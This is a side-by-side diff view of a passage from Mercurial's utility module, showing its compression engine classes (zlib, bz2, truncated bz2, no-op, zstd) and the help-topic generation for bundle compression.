3286 return -1 * getattr(w, attr), w.name
3290
3287
3291 return list(sorted(engines, key=getkey))
3288 return list(sorted(engines, key=getkey))
3292
3289
3293 def forwiretype(self, wiretype):
3290 def forwiretype(self, wiretype):
3294 engine = self._engines[self._wiretypes[wiretype]]
3291 engine = self._engines[self._wiretypes[wiretype]]
3295 if not engine.available():
3292 if not engine.available():
3296 raise error.Abort(_('compression engine %s could not be loaded') %
3293 raise error.Abort(_('compression engine %s could not be loaded') %
3297 engine.name())
3294 engine.name())
3298 return engine
3295 return engine
3299
3296
3300 def forrevlogheader(self, header):
3297 def forrevlogheader(self, header):
3301 """Obtain a compression engine registered to a revlog header.
3298 """Obtain a compression engine registered to a revlog header.
3302
3299
3303 Will raise KeyError if the revlog header value isn't registered.
3300 Will raise KeyError if the revlog header value isn't registered.
3304 """
3301 """
3305 return self._engines[self._revlogheaders[header]]
3302 return self._engines[self._revlogheaders[header]]
3306
3303
3307 compengines = compressormanager()
3304 compengines = compressormanager()
3308
3305
3309 class compressionengine(object):
3306 class compressionengine(object):
3310 """Base class for compression engines.
3307 """Base class for compression engines.
3311
3308
3312 Compression engines must implement the interface defined by this class.
3309 Compression engines must implement the interface defined by this class.
3313 """
3310 """
3314 def name(self):
3311 def name(self):
3315 """Returns the name of the compression engine.
3312 """Returns the name of the compression engine.
3316
3313
3317 This is the key the engine is registered under.
3314 This is the key the engine is registered under.
3318
3315
3319 This method must be implemented.
3316 This method must be implemented.
3320 """
3317 """
3321 raise NotImplementedError()
3318 raise NotImplementedError()
3322
3319
3323 def available(self):
3320 def available(self):
3324 """Whether the compression engine is available.
3321 """Whether the compression engine is available.
3325
3322
3326 The intent of this method is to allow optional compression engines
3323 The intent of this method is to allow optional compression engines
3327 that may not be available in all installations (such as engines relying
3324 that may not be available in all installations (such as engines relying
3328 on C extensions that may not be present).
3325 on C extensions that may not be present).
3329 """
3326 """
3330 return True
3327 return True
3331
3328
3332 def bundletype(self):
3329 def bundletype(self):
3333 """Describes bundle identifiers for this engine.
3330 """Describes bundle identifiers for this engine.
3334
3331
3335 If this compression engine isn't supported for bundles, returns None.
3332 If this compression engine isn't supported for bundles, returns None.
3336
3333
3337 If this engine can be used for bundles, returns a 2-tuple of strings of
3334 If this engine can be used for bundles, returns a 2-tuple of strings of
3338 the user-facing "bundle spec" compression name and an internal
3335 the user-facing "bundle spec" compression name and an internal
3339 identifier used to denote the compression format within bundles. To
3336 identifier used to denote the compression format within bundles. To
3340 exclude the name from external usage, set the first element to ``None``.
3337 exclude the name from external usage, set the first element to ``None``.
3341
3338
3342 If bundle compression is supported, the class must also implement
3339 If bundle compression is supported, the class must also implement
3343 ``compressstream`` and `decompressorreader``.
3340 ``compressstream`` and `decompressorreader``.
3344
3341
3345 The docstring of this method is used in the help system to tell users
3342 The docstring of this method is used in the help system to tell users
3346 about this engine.
3343 about this engine.
3347 """
3344 """
3348 return None
3345 return None
3349
3346
3350 def wireprotosupport(self):
3347 def wireprotosupport(self):
3351 """Declare support for this compression format on the wire protocol.
3348 """Declare support for this compression format on the wire protocol.
3352
3349
3353 If this compression engine isn't supported for compressing wire
3350 If this compression engine isn't supported for compressing wire
3354 protocol payloads, returns None.
3351 protocol payloads, returns None.
3355
3352
3356 Otherwise, returns ``compenginewireprotosupport`` with the following
3353 Otherwise, returns ``compenginewireprotosupport`` with the following
3357 fields:
3354 fields:
3358
3355
3359 * String format identifier
3356 * String format identifier
3360 * Integer priority for the server
3357 * Integer priority for the server
3361 * Integer priority for the client
3358 * Integer priority for the client
3362
3359
3363 The integer priorities are used to order the advertisement of format
3360 The integer priorities are used to order the advertisement of format
3364 support by server and client. The highest integer is advertised
3361 support by server and client. The highest integer is advertised
3365 first. Integers with non-positive values aren't advertised.
3362 first. Integers with non-positive values aren't advertised.
3366
3363
3367 The priority values are somewhat arbitrary and only used for default
3364 The priority values are somewhat arbitrary and only used for default
3368 ordering. The relative order can be changed via config options.
3365 ordering. The relative order can be changed via config options.
3369
3366
3370 If wire protocol compression is supported, the class must also implement
3367 If wire protocol compression is supported, the class must also implement
3371 ``compressstream`` and ``decompressorreader``.
3368 ``compressstream`` and ``decompressorreader``.
3372 """
3369 """
3373 return None
3370 return None
3374
3371
3375 def revlogheader(self):
3372 def revlogheader(self):
3376 """Header added to revlog chunks that identifies this engine.
3373 """Header added to revlog chunks that identifies this engine.
3377
3374
3378 If this engine can be used to compress revlogs, this method should
3375 If this engine can be used to compress revlogs, this method should
3379 return the bytes used to identify chunks compressed with this engine.
3376 return the bytes used to identify chunks compressed with this engine.
3380 Else, the method should return ``None`` to indicate it does not
3377 Else, the method should return ``None`` to indicate it does not
3381 participate in revlog compression.
3378 participate in revlog compression.
3382 """
3379 """
3383 return None
3380 return None
3384
3381
3385 def compressstream(self, it, opts=None):
3382 def compressstream(self, it, opts=None):
3386 """Compress an iterator of chunks.
3383 """Compress an iterator of chunks.
3387
3384
3388 The method receives an iterator (ideally a generator) of chunks of
3385 The method receives an iterator (ideally a generator) of chunks of
3389 bytes to be compressed. It returns an iterator (ideally a generator)
3386 bytes to be compressed. It returns an iterator (ideally a generator)
3390 of bytes of chunks representing the compressed output.
3387 of bytes of chunks representing the compressed output.
3391
3388
3392 Optionally accepts an argument defining how to perform compression.
3389 Optionally accepts an argument defining how to perform compression.
3393 Each engine treats this argument differently.
3390 Each engine treats this argument differently.
3394 """
3391 """
3395 raise NotImplementedError()
3392 raise NotImplementedError()
3396
3393
3397 def decompressorreader(self, fh):
3394 def decompressorreader(self, fh):
3398 """Perform decompression on a file object.
3395 """Perform decompression on a file object.
3399
3396
3400 Argument is an object with a ``read(size)`` method that returns
3397 Argument is an object with a ``read(size)`` method that returns
3401 compressed data. Return value is an object with a ``read(size)`` that
3398 compressed data. Return value is an object with a ``read(size)`` that
3402 returns uncompressed data.
3399 returns uncompressed data.
3403 """
3400 """
3404 raise NotImplementedError()
3401 raise NotImplementedError()
3405
3402
3406 def revlogcompressor(self, opts=None):
3403 def revlogcompressor(self, opts=None):
3407 """Obtain an object that can be used to compress revlog entries.
3404 """Obtain an object that can be used to compress revlog entries.
3408
3405
3409 The object has a ``compress(data)`` method that compresses binary
3406 The object has a ``compress(data)`` method that compresses binary
3410 data. This method returns compressed binary data or ``None`` if
3407 data. This method returns compressed binary data or ``None`` if
3411 the data could not be compressed (too small, not compressible, etc).
3408 the data could not be compressed (too small, not compressible, etc).
3412 The returned data should have a header uniquely identifying this
3409 The returned data should have a header uniquely identifying this
3413 compression format so decompression can be routed to this engine.
3410 compression format so decompression can be routed to this engine.
3414 This header should be identified by the ``revlogheader()`` return
3411 This header should be identified by the ``revlogheader()`` return
3415 value.
3412 value.
3416
3413
3417 The object has a ``decompress(data)`` method that decompresses
3414 The object has a ``decompress(data)`` method that decompresses
3418 data. The method will only be called if ``data`` begins with
3415 data. The method will only be called if ``data`` begins with
3419 ``revlogheader()``. The method should return the raw, uncompressed
3416 ``revlogheader()``. The method should return the raw, uncompressed
3420 data or raise a ``RevlogError``.
3417 data or raise a ``RevlogError``.
3421
3418
3422 The object is reusable but is not thread safe.
3419 The object is reusable but is not thread safe.
3423 """
3420 """
3424 raise NotImplementedError()
3421 raise NotImplementedError()
3425
3422
3426 class _zlibengine(compressionengine):
3423 class _zlibengine(compressionengine):
3427 def name(self):
3424 def name(self):
3428 return 'zlib'
3425 return 'zlib'
3429
3426
3430 def bundletype(self):
3427 def bundletype(self):
3431 """zlib compression using the DEFLATE algorithm.
3428 """zlib compression using the DEFLATE algorithm.
3432
3429
3433 All Mercurial clients should support this format. The compression
3430 All Mercurial clients should support this format. The compression
3434 algorithm strikes a reasonable balance between compression ratio
3431 algorithm strikes a reasonable balance between compression ratio
3435 and size.
3432 and size.
3436 """
3433 """
3437 return 'gzip', 'GZ'
3434 return 'gzip', 'GZ'
3438
3435
3439 def wireprotosupport(self):
3436 def wireprotosupport(self):
3440 return compewireprotosupport('zlib', 20, 20)
3437 return compewireprotosupport('zlib', 20, 20)
3441
3438
3442 def revlogheader(self):
3439 def revlogheader(self):
3443 return 'x'
3440 return 'x'
3444
3441
3445 def compressstream(self, it, opts=None):
3442 def compressstream(self, it, opts=None):
3446 opts = opts or {}
3443 opts = opts or {}
3447
3444
3448 z = zlib.compressobj(opts.get('level', -1))
3445 z = zlib.compressobj(opts.get('level', -1))
3449 for chunk in it:
3446 for chunk in it:
3450 data = z.compress(chunk)
3447 data = z.compress(chunk)
3451 # Not all calls to compress emit data. It is cheaper to inspect
3448 # Not all calls to compress emit data. It is cheaper to inspect
3452 # here than to feed empty chunks through generator.
3449 # here than to feed empty chunks through generator.
3453 if data:
3450 if data:
3454 yield data
3451 yield data
3455
3452
3456 yield z.flush()
3453 yield z.flush()
3457
3454
3458 def decompressorreader(self, fh):
3455 def decompressorreader(self, fh):
3459 def gen():
3456 def gen():
3460 d = zlib.decompressobj()
3457 d = zlib.decompressobj()
3461 for chunk in filechunkiter(fh):
3458 for chunk in filechunkiter(fh):
3462 while chunk:
3459 while chunk:
3463 # Limit output size to limit memory.
3460 # Limit output size to limit memory.
3464 yield d.decompress(chunk, 2 ** 18)
3461 yield d.decompress(chunk, 2 ** 18)
3465 chunk = d.unconsumed_tail
3462 chunk = d.unconsumed_tail
3466
3463
3467 return chunkbuffer(gen())
3464 return chunkbuffer(gen())
3468
3465
3469 class zlibrevlogcompressor(object):
3466 class zlibrevlogcompressor(object):
3470 def compress(self, data):
3467 def compress(self, data):
3471 insize = len(data)
3468 insize = len(data)
3472 # Caller handles empty input case.
3469 # Caller handles empty input case.
3473 assert insize > 0
3470 assert insize > 0
3474
3471
3475 if insize < 44:
3472 if insize < 44:
3476 return None
3473 return None
3477
3474
3478 elif insize <= 1000000:
3475 elif insize <= 1000000:
3479 compressed = zlib.compress(data)
3476 compressed = zlib.compress(data)
3480 if len(compressed) < insize:
3477 if len(compressed) < insize:
3481 return compressed
3478 return compressed
3482 return None
3479 return None
3483
3480
3484 # zlib makes an internal copy of the input buffer, doubling
3481 # zlib makes an internal copy of the input buffer, doubling
3485 # memory usage for large inputs. So do streaming compression
3482 # memory usage for large inputs. So do streaming compression
3486 # on large inputs.
3483 # on large inputs.
3487 else:
3484 else:
3488 z = zlib.compressobj()
3485 z = zlib.compressobj()
3489 parts = []
3486 parts = []
3490 pos = 0
3487 pos = 0
3491 while pos < insize:
3488 while pos < insize:
3492 pos2 = pos + 2**20
3489 pos2 = pos + 2**20
3493 parts.append(z.compress(data[pos:pos2]))
3490 parts.append(z.compress(data[pos:pos2]))
3494 pos = pos2
3491 pos = pos2
3495 parts.append(z.flush())
3492 parts.append(z.flush())
3496
3493
3497 if sum(map(len, parts)) < insize:
3494 if sum(map(len, parts)) < insize:
3498 return ''.join(parts)
3495 return ''.join(parts)
3499 return None
3496 return None
3500
3497
3501 def decompress(self, data):
3498 def decompress(self, data):
3502 try:
3499 try:
3503 return zlib.decompress(data)
3500 return zlib.decompress(data)
3504 except zlib.error as e:
3501 except zlib.error as e:
3505 raise error.RevlogError(_('revlog decompress error: %s') %
3502 raise error.RevlogError(_('revlog decompress error: %s') %
3506 str(e))
3503 str(e))
3507
3504
3508 def revlogcompressor(self, opts=None):
3505 def revlogcompressor(self, opts=None):
3509 return self.zlibrevlogcompressor()
3506 return self.zlibrevlogcompressor()
3510
3507
3511 compengines.register(_zlibengine())
3508 compengines.register(_zlibengine())
3512
3509
3513 class _bz2engine(compressionengine):
3510 class _bz2engine(compressionengine):
3514 def name(self):
3511 def name(self):
3515 return 'bz2'
3512 return 'bz2'
3516
3513
3517 def bundletype(self):
3514 def bundletype(self):
3518 """An algorithm that produces smaller bundles than ``gzip``.
3515 """An algorithm that produces smaller bundles than ``gzip``.
3519
3516
3520 All Mercurial clients should support this format.
3517 All Mercurial clients should support this format.
3521
3518
3522 This engine will likely produce smaller bundles than ``gzip`` but
3519 This engine will likely produce smaller bundles than ``gzip`` but
3523 will be significantly slower, both during compression and
3520 will be significantly slower, both during compression and
3524 decompression.
3521 decompression.
3525
3522
3526 If available, the ``zstd`` engine can yield similar or better
3523 If available, the ``zstd`` engine can yield similar or better
3527 compression at much higher speeds.
3524 compression at much higher speeds.
3528 """
3525 """
3529 return 'bzip2', 'BZ'
3526 return 'bzip2', 'BZ'
3530
3527
3531 # We declare a protocol name but don't advertise by default because
3528 # We declare a protocol name but don't advertise by default because
3532 # it is slow.
3529 # it is slow.
3533 def wireprotosupport(self):
3530 def wireprotosupport(self):
3534 return compewireprotosupport('bzip2', 0, 0)
3531 return compewireprotosupport('bzip2', 0, 0)
3535
3532
3536 def compressstream(self, it, opts=None):
3533 def compressstream(self, it, opts=None):
3537 opts = opts or {}
3534 opts = opts or {}
3538 z = bz2.BZ2Compressor(opts.get('level', 9))
3535 z = bz2.BZ2Compressor(opts.get('level', 9))
3539 for chunk in it:
3536 for chunk in it:
3540 data = z.compress(chunk)
3537 data = z.compress(chunk)
3541 if data:
3538 if data:
3542 yield data
3539 yield data
3543
3540
3544 yield z.flush()
3541 yield z.flush()
3545
3542
3546 def decompressorreader(self, fh):
3543 def decompressorreader(self, fh):
3547 def gen():
3544 def gen():
3548 d = bz2.BZ2Decompressor()
3545 d = bz2.BZ2Decompressor()
3549 for chunk in filechunkiter(fh):
3546 for chunk in filechunkiter(fh):
3550 yield d.decompress(chunk)
3547 yield d.decompress(chunk)
3551
3548
3552 return chunkbuffer(gen())
3549 return chunkbuffer(gen())
3553
3550
3554 compengines.register(_bz2engine())
3551 compengines.register(_bz2engine())
3555
3552
3556 class _truncatedbz2engine(compressionengine):
3553 class _truncatedbz2engine(compressionengine):
3557 def name(self):
3554 def name(self):
3558 return 'bz2truncated'
3555 return 'bz2truncated'
3559
3556
3560 def bundletype(self):
3557 def bundletype(self):
3561 return None, '_truncatedBZ'
3558 return None, '_truncatedBZ'
3562
3559
3563 # We don't implement compressstream because it is hackily handled elsewhere.
3560 # We don't implement compressstream because it is hackily handled elsewhere.
3564
3561
3565 def decompressorreader(self, fh):
3562 def decompressorreader(self, fh):
3566 def gen():
3563 def gen():
3567 # The input stream doesn't have the 'BZ' header. So add it back.
3564 # The input stream doesn't have the 'BZ' header. So add it back.
3568 d = bz2.BZ2Decompressor()
3565 d = bz2.BZ2Decompressor()
3569 d.decompress('BZ')
3566 d.decompress('BZ')
3570 for chunk in filechunkiter(fh):
3567 for chunk in filechunkiter(fh):
3571 yield d.decompress(chunk)
3568 yield d.decompress(chunk)
3572
3569
3573 return chunkbuffer(gen())
3570 return chunkbuffer(gen())
3574
3571
3575 compengines.register(_truncatedbz2engine())
3572 compengines.register(_truncatedbz2engine())
3576
3573
3577 class _noopengine(compressionengine):
3574 class _noopengine(compressionengine):
3578 def name(self):
3575 def name(self):
3579 return 'none'
3576 return 'none'
3580
3577
3581 def bundletype(self):
3578 def bundletype(self):
3582 """No compression is performed.
3579 """No compression is performed.
3583
3580
3584 Use this compression engine to explicitly disable compression.
3581 Use this compression engine to explicitly disable compression.
3585 """
3582 """
3586 return 'none', 'UN'
3583 return 'none', 'UN'
3587
3584
3588 # Clients always support uncompressed payloads. Servers don't because
3585 # Clients always support uncompressed payloads. Servers don't because
3589 # unless you are on a fast network, uncompressed payloads can easily
3586 # unless you are on a fast network, uncompressed payloads can easily
3590 # saturate your network pipe.
3587 # saturate your network pipe.
3591 def wireprotosupport(self):
3588 def wireprotosupport(self):
3592 return compewireprotosupport('none', 0, 10)
3589 return compewireprotosupport('none', 0, 10)
3593
3590
3594 # We don't implement revlogheader because it is handled specially
3591 # We don't implement revlogheader because it is handled specially
3595 # in the revlog class.
3592 # in the revlog class.
3596
3593
3597 def compressstream(self, it, opts=None):
3594 def compressstream(self, it, opts=None):
3598 return it
3595 return it
3599
3596
3600 def decompressorreader(self, fh):
3597 def decompressorreader(self, fh):
3601 return fh
3598 return fh
3602
3599
3603 class nooprevlogcompressor(object):
3600 class nooprevlogcompressor(object):
3604 def compress(self, data):
3601 def compress(self, data):
3605 return None
3602 return None
3606
3603
3607 def revlogcompressor(self, opts=None):
3604 def revlogcompressor(self, opts=None):
3608 return self.nooprevlogcompressor()
3605 return self.nooprevlogcompressor()
3609
3606
3610 compengines.register(_noopengine())
3607 compengines.register(_noopengine())
3611
3608
3612 class _zstdengine(compressionengine):
3609 class _zstdengine(compressionengine):
3613 def name(self):
3610 def name(self):
3614 return 'zstd'
3611 return 'zstd'
3615
3612
3616 @propertycache
3613 @propertycache
3617 def _module(self):
3614 def _module(self):
3618 # Not all installs have the zstd module available. So defer importing
3615 # Not all installs have the zstd module available. So defer importing
3619 # until first access.
3616 # until first access.
3620 try:
3617 try:
3621 from . import zstd
3618 from . import zstd
3622 # Force delayed import.
3619 # Force delayed import.
3623 zstd.__version__
3620 zstd.__version__
3624 return zstd
3621 return zstd
3625 except ImportError:
3622 except ImportError:
3626 return None
3623 return None
3627
3624
3628 def available(self):
3625 def available(self):
3629 return bool(self._module)
3626 return bool(self._module)
3630
3627
3631 def bundletype(self):
3628 def bundletype(self):
3632 """A modern compression algorithm that is fast and highly flexible.
3629 """A modern compression algorithm that is fast and highly flexible.
3633
3630
3634 Only supported by Mercurial 4.1 and newer clients.
3631 Only supported by Mercurial 4.1 and newer clients.
3635
3632
3636 With the default settings, zstd compression is both faster and yields
3633 With the default settings, zstd compression is both faster and yields
3637 better compression than ``gzip``. It also frequently yields better
3634 better compression than ``gzip``. It also frequently yields better
3638 compression than ``bzip2`` while operating at much higher speeds.
3635 compression than ``bzip2`` while operating at much higher speeds.
3639
3636
3640 If this engine is available and backwards compatibility is not a
3637 If this engine is available and backwards compatibility is not a
3641 concern, it is likely the best available engine.
3638 concern, it is likely the best available engine.
3642 """
3639 """
3643 return 'zstd', 'ZS'
3640 return 'zstd', 'ZS'
3644
3641
3645 def wireprotosupport(self):
3642 def wireprotosupport(self):
3646 return compewireprotosupport('zstd', 50, 50)
3643 return compewireprotosupport('zstd', 50, 50)
3647
3644
3648 def revlogheader(self):
3645 def revlogheader(self):
3649 return '\x28'
3646 return '\x28'
3650
3647
3651 def compressstream(self, it, opts=None):
3648 def compressstream(self, it, opts=None):
3652 opts = opts or {}
3649 opts = opts or {}
3653 # zstd level 3 is almost always significantly faster than zlib
3650 # zstd level 3 is almost always significantly faster than zlib
3654 # while providing no worse compression. It strikes a good balance
3651 # while providing no worse compression. It strikes a good balance
3655 # between speed and compression.
3652 # between speed and compression.
3656 level = opts.get('level', 3)
3653 level = opts.get('level', 3)
3657
3654
3658 zstd = self._module
3655 zstd = self._module
3659 z = zstd.ZstdCompressor(level=level).compressobj()
3656 z = zstd.ZstdCompressor(level=level).compressobj()
3660 for chunk in it:
3657 for chunk in it:
3661 data = z.compress(chunk)
3658 data = z.compress(chunk)
3662 if data:
3659 if data:
3663 yield data
3660 yield data
3664
3661
3665 yield z.flush()
3662 yield z.flush()
3666
3663
3667 def decompressorreader(self, fh):
3664 def decompressorreader(self, fh):
3668 zstd = self._module
3665 zstd = self._module
3669 dctx = zstd.ZstdDecompressor()
3666 dctx = zstd.ZstdDecompressor()
3670 return chunkbuffer(dctx.read_from(fh))
3667 return chunkbuffer(dctx.read_from(fh))
3671
3668
3672 class zstdrevlogcompressor(object):
3669 class zstdrevlogcompressor(object):
3673 def __init__(self, zstd, level=3):
3670 def __init__(self, zstd, level=3):
3674 # Writing the content size adds a few bytes to the output. However,
3671 # Writing the content size adds a few bytes to the output. However,
3675 # it allows decompression to be more optimal since we can
3672 # it allows decompression to be more optimal since we can
3676 # pre-allocate a buffer to hold the result.
3673 # pre-allocate a buffer to hold the result.
3677 self._cctx = zstd.ZstdCompressor(level=level,
3674 self._cctx = zstd.ZstdCompressor(level=level,
3678 write_content_size=True)
3675 write_content_size=True)
3679 self._dctx = zstd.ZstdDecompressor()
3676 self._dctx = zstd.ZstdDecompressor()
3680 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3677 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3681 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3678 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3682
3679
3683 def compress(self, data):
3680 def compress(self, data):
3684 insize = len(data)
3681 insize = len(data)
3685 # Caller handles empty input case.
3682 # Caller handles empty input case.
3686 assert insize > 0
3683 assert insize > 0
3687
3684
3688 if insize < 50:
3685 if insize < 50:
3689 return None
3686 return None
3690
3687
3691 elif insize <= 1000000:
3688 elif insize <= 1000000:
3692 compressed = self._cctx.compress(data)
3689 compressed = self._cctx.compress(data)
3693 if len(compressed) < insize:
3690 if len(compressed) < insize:
3694 return compressed
3691 return compressed
3695 return None
3692 return None
3696 else:
3693 else:
3697 z = self._cctx.compressobj()
3694 z = self._cctx.compressobj()
3698 chunks = []
3695 chunks = []
3699 pos = 0
3696 pos = 0
3700 while pos < insize:
3697 while pos < insize:
3701 pos2 = pos + self._compinsize
3698 pos2 = pos + self._compinsize
3702 chunk = z.compress(data[pos:pos2])
3699 chunk = z.compress(data[pos:pos2])
3703 if chunk:
3700 if chunk:
3704 chunks.append(chunk)
3701 chunks.append(chunk)
3705 pos = pos2
3702 pos = pos2
3706 chunks.append(z.flush())
3703 chunks.append(z.flush())
3707
3704
3708 if sum(map(len, chunks)) < insize:
3705 if sum(map(len, chunks)) < insize:
3709 return ''.join(chunks)
3706 return ''.join(chunks)
3710 return None
3707 return None
3711
3708
3712 def decompress(self, data):
3709 def decompress(self, data):
3713 insize = len(data)
3710 insize = len(data)
3714
3711
3715 try:
3712 try:
3716 # This was measured to be faster than other streaming
3713 # This was measured to be faster than other streaming
3717 # decompressors.
3714 # decompressors.
3718 dobj = self._dctx.decompressobj()
3715 dobj = self._dctx.decompressobj()
3719 chunks = []
3716 chunks = []
3720 pos = 0
3717 pos = 0
3721 while pos < insize:
3718 while pos < insize:
3722 pos2 = pos + self._decompinsize
3719 pos2 = pos + self._decompinsize
3723 chunk = dobj.decompress(data[pos:pos2])
3720 chunk = dobj.decompress(data[pos:pos2])
3724 if chunk:
3721 if chunk:
3725 chunks.append(chunk)
3722 chunks.append(chunk)
3726 pos = pos2
3723 pos = pos2
3727 # Frame should be exhausted, so no finish() API.
3724 # Frame should be exhausted, so no finish() API.
3728
3725
3729 return ''.join(chunks)
3726 return ''.join(chunks)
3730 except Exception as e:
3727 except Exception as e:
3731 raise error.RevlogError(_('revlog decompress error: %s') %
3728 raise error.RevlogError(_('revlog decompress error: %s') %
3732 str(e))
3729 str(e))
3733
3730
3734 def revlogcompressor(self, opts=None):
3731 def revlogcompressor(self, opts=None):
3735 opts = opts or {}
3732 opts = opts or {}
3736 return self.zstdrevlogcompressor(self._module,
3733 return self.zstdrevlogcompressor(self._module,
3737 level=opts.get('level', 3))
3734 level=opts.get('level', 3))
3738
3735
3739 compengines.register(_zstdengine())
3736 compengines.register(_zstdengine())
3740
3737
3741 def bundlecompressiontopics():
3738 def bundlecompressiontopics():
3742 """Obtains a list of available bundle compressions for use in help."""
3739 """Obtains a list of available bundle compressions for use in help."""
3743 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3740 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3744 items = {}
3741 items = {}
3745
3742
3746 # We need to format the docstring. So use a dummy object/type to hold it
3743 # We need to format the docstring. So use a dummy object/type to hold it
3747 # rather than mutating the original.
3744 # rather than mutating the original.
3748 class docobject(object):
3745 class docobject(object):
3749 pass
3746 pass
3750
3747
3751 for name in compengines:
3748 for name in compengines:
3752 engine = compengines[name]
3749 engine = compengines[name]
3753
3750
3754 if not engine.available():
3751 if not engine.available():
3755 continue
3752 continue
3756
3753
3757 bt = engine.bundletype()
3754 bt = engine.bundletype()
3758 if not bt or not bt[0]:
3755 if not bt or not bt[0]:
3759 continue
3756 continue
3760
3757
3761 doc = pycompat.sysstr('``%s``\n %s') % (
3758 doc = pycompat.sysstr('``%s``\n %s') % (
3762 bt[0], engine.bundletype.__doc__)
3759 bt[0], engine.bundletype.__doc__)
3763
3760
3764 value = docobject()
3761 value = docobject()
3765 value.__doc__ = doc
3762 value.__doc__ = doc
3766 value._origdoc = engine.bundletype.__doc__
3763 value._origdoc = engine.bundletype.__doc__
3767 value._origfunc = engine.bundletype
3764 value._origfunc = engine.bundletype
3768
3765
3769 items[bt[0]] = value
3766 items[bt[0]] = value
3770
3767
3771 return items
3768 return items
3772
3769
3773 i18nfunctions = bundlecompressiontopics().values()
3770 i18nfunctions = bundlecompressiontopics().values()
3774
3771
3775 # convenient shortcut
3772 # convenient shortcut
3776 dst = debugstacktrace
3773 dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now